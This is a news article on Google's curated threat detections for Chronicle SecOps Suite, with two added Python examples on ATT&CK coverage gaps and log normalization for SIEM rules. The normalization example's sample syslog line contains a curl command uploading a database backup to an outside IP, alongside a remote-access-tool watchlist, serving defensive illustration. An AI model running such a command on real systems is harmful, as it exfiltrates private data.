Google Brings Curated Detections to Cloud Security Service
Google has made generally available a set of curated detections for organizations that have adopted its Chronicle SecOps Suite.
Chris Corde, director of product management for security at Google Cloud, said those detections are the first in a series of ongoing updates that will increasingly shift more responsibility for security operations to the cloud service provider.
The detections, built by the Google Cloud Threat Intelligence (GCTI) research team, identify ransomware attacks, remote access tools (RATs) and infostealers aimed at Windows platforms, along with data exfiltration and other types of suspicious network activity. As Chronicle SecOps Suite continues to evolve, Google will add capabilities to detect a wider range of attack vectors over the next 12 to 24 months, said Corde.
The detections provided by Google will align with the MITRE ATT&CK framework to make it simpler to both understand adversary tactics and techniques and uncover potential gaps in defenses, he added.
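Mapping each detection to the ATT&CK techniques it claims to cover is what makes the gap analysis mentioned above concrete: once every rule carries technique IDs, the techniques and whole tactics with no rule behind them fall out of a set difference. The following is an added example, not Chronicle code or a Google rule set; the rule names and the list of techniques the hypothetical team wants covered are constructed, while the technique IDs and tactic names are real ATT&CK entries.

```python
"""Map a set of detection rules to MITRE ATT&CK techniques and report coverage gaps.

Added example, not Chronicle or Google code. The rule names and the set of
required techniques are constructed for illustration; the technique IDs and
tactic names are real ATT&CK entries.
"""
from collections import defaultdict

# Constructed: the techniques this (hypothetical) team wants detections for,
# keyed by ATT&CK technique ID -> (tactic, technique name).
REQUIRED_TECHNIQUES = {
    "T1566": ("initial-access", "Phishing"),
    "T1059": ("execution", "Command and Scripting Interpreter"),
    "T1003": ("credential-access", "OS Credential Dumping"),
    "T1555": ("credential-access", "Credentials from Password Stores"),
    "T1219": ("command-and-control", "Remote Access Software"),
    "T1041": ("exfiltration", "Exfiltration Over C2 Channel"),
    "T1486": ("impact", "Data Encrypted for Impact"),
}

# Constructed: curated detections as a vendor might ship them, each tagged
# with the technique IDs it claims to cover (names are made up).
CURATED_DETECTIONS = [
    {"name": "ransomware_mass_file_encryption", "techniques": ["T1486"]},
    {"name": "rat_remote_access_tool_execution", "techniques": ["T1219"]},
    {"name": "infostealer_browser_credential_read", "techniques": ["T1555"]},
    {"name": "exfil_large_outbound_transfer", "techniques": ["T1041"]},
]


def coverage_report(required, detections):
    """Return (covered, gaps, by_tactic).

    covered:   technique ID -> list of rule names that claim it
    gaps:      sorted technique IDs with no rule at all
    by_tactic: tactic -> {"covered": n, "total": m}
    """
    covered = defaultdict(list)
    for rule in detections:
        for tid in rule["techniques"]:
            if tid in required:
                covered[tid].append(rule["name"])
    gaps = sorted(tid for tid in required if tid not in covered)
    by_tactic = defaultdict(lambda: {"covered": 0, "total": 0})
    for tid, (tactic, _name) in required.items():
        by_tactic[tactic]["total"] += 1
        if tid in covered:
            by_tactic[tactic]["covered"] += 1
    return dict(covered), gaps, dict(by_tactic)


def gap_tactics(required, detections):
    """Tactics with zero coverage: stages of an attack chain that would run unseen."""
    _covered, _gaps, by_tactic = coverage_report(required, detections)
    return sorted(t for t, c in by_tactic.items() if c["covered"] == 0)


if __name__ == "__main__":
    covered, gaps, by_tactic = coverage_report(REQUIRED_TECHNIQUES, CURATED_DETECTIONS)
    for tactic, c in by_tactic.items():
        print(f"{tactic:22} {c['covered']}/{c['total']}")
    for tid in gaps:
        tactic, name = REQUIRED_TECHNIQUES[tid]
        print(f"GAP {tid} {name} ({tactic})")
    print("tactics with no detections:", gap_tactics(REQUIRED_TECHNIQUES, CURATED_DETECTIONS))
```

With the constructed data the report shows that the vendor rules cover impact, command-and-control, exfiltration and half of credential access, while initial access and execution have nothing behind them; the point of tagging is that this answer comes from the rule metadata rather than from someone's memory of what the rules do.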
The Chronicle SecOps Suite was created to eliminate the need for security operations teams to deploy and maintain their own security information and event management (SIEM) platform, said Corde. Too many cybersecurity teams are devoting time and resources to running security operations tooling at the expense of finding threats and remediating vulnerabilities, he noted.
Chronicle SecOps Suite, in effect, enables organizations to rely on Google to manage security operations on their behalf by, for example, eliminating the need for cybersecurity teams to write and continuously update rule sets, Corde explained. It also gives organizations the option to tune the alerts it generates using either a standard mode or a precision mode; the precision mode provides higher-fidelity insights and generates more alerts, he noted.
It’s not clear how willing organizations will be to essentially outsource security operations, but as threats increase both in volume and sophistication more organizations are struggling to find the resources required to defend themselves. Many cybersecurity platforms and tools are never used simply because there isn’t enough available expertise to deploy and maintain them.
Cybersecurity, at its core, has always been a big data challenge that consumes substantial compute and storage resources, said Corde. One of the advantages of Chronicle SecOps Suite is that all the data collected is already normalized, he added. In contrast, organizations that deploy their own SIEM have to normalize all the data they collect on their own, noted Corde.
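Normalization is the part of running a SIEM that the article says Google takes off the team's plate, so it is worth seeing what it involves. Two hosts report the same kind of event (a process starting) in two unrelated formats; a detection rule can only be written once if both are first mapped onto one schema with shared field names, types and timestamp format. The block below is an added example and is not Chronicle or Google code: the schema field names are my own and only loosely resemble a cloud SIEM's unified event model, the two log lines are constructed, the remote-access-tool watchlist is constructed, and the syslog year is an assumption because classic syslog timestamps omit it.

```python
"""Normalize two differently formatted log sources into one event schema, then
run a single detection over the result.

Added example, not Chronicle or Google code. Field names are my own; the two
sample log lines, the RAT watchlist and the assumed syslog year are constructed.
"""
import json
import re
from datetime import datetime, timezone

# Constructed sample: a Windows process-creation record exported as JSON.
WINDOWS_EVENT = (
    '{"TimeCreated":"2023-04-12T10:15:30Z","EventID":1,"Computer":"WS-042",'
    '"User":"CORP\\\\alice","Image":"C:\\\\Tools\\\\AnyDesk.exe","ProcessId":"4120"}'
)

# Constructed sample: a syslog line from a Linux host's process logger.
SYSLOG_EVENT = (
    "Apr 12 10:16:02 srv-07 procmon[812]: uid=1001 user=bob pid=5531 "
    "exe=/usr/bin/curl args='curl -T /var/backups/db.tgz https://203.0.113.9/upload'"
)

SYSLOG_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) (?P<host>\S+) \S+\[\d+\]: "
    r"uid=(?P<uid>\d+) user=(?P<user>\S+) pid=(?P<pid>\d+) "
    r"exe=(?P<exe>\S+) args='(?P<args>[^']*)'"
)

# Constructed watchlist of remote-access-tool binaries (lower-case base names).
RAT_WATCHLIST = {"anydesk.exe", "teamviewer.exe", "ammyy.exe"}


def process_name(path):
    """Base name of a process path, lower-cased, for either path convention."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def normalize_windows(raw):
    """Map the Windows JSON record onto the common schema."""
    ev = json.loads(raw)
    return {
        "event_type": "PROCESS_LAUNCH",
        "timestamp": ev["TimeCreated"],                      # already ISO-8601 UTC
        "host": ev["Computer"].lower(),
        "user": ev["User"].split("\\")[-1].lower(),          # drop the DOMAIN\ prefix
        "process_path": ev["Image"],
        "process_pid": int(ev["ProcessId"]),                 # string in the source
        "command_line": ev.get("CommandLine", ""),
        "source_log": "windows",
    }


def normalize_syslog(raw, year=2023):
    """Map the syslog line onto the same schema; `year` is assumed (syslog omits it)."""
    m = SYSLOG_RE.match(raw)
    if not m:
        raise ValueError("unrecognised syslog line")
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S").replace(tzinfo=timezone.utc)
    return {
        "event_type": "PROCESS_LAUNCH",
        "timestamp": ts.strftime("%Y-%m-%dT%H:%M:%SZ"),
        "host": m["host"].lower(),
        "user": m["user"].lower(),
        "process_path": m["exe"],
        "process_pid": int(m["pid"]),
        "command_line": m["args"],
        "source_log": "syslog",
    }


def match_rat_watchlist(events):
    """One rule over normalized events: hosts that launched a watch-listed RAT binary."""
    return [e["host"] for e in events
            if e["event_type"] == "PROCESS_LAUNCH"
            and process_name(e["process_path"]) in RAT_WATCHLIST]


if __name__ == "__main__":
    events = [normalize_windows(WINDOWS_EVENT), normalize_syslog(SYSLOG_EVENT)]
    for e in events:
        print(json.dumps(e))
    print("RAT launches on:", match_rat_watchlist(events))
```

The watchlist rule never has to know whether the event came from Windows JSON or from syslog; that independence is what normalization buys, and it is also why the work is unglamorous: every new source needs its own parser, its own timestamp and case-folding rules, and maintenance whenever a vendor changes a field.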
In general, security operations platforms are migrating to the cloud because it is easier to secure a distributed computing environment via a centralized control plane. In the wake of the COVID-19 pandemic, it’s become more apparent that cybersecurity teams need to be able to access tools and platforms from wherever they are at any time of day. Cybercriminals, after all, are liable to strike when they believe the fewest number of cybersecurity professionals are able to respond.
Time, of course, is of the essence when any cyberattack is discovered. The issue organizations need to evaluate is just how much damage can be done between when they suspect an attack and when they can actually do something about it.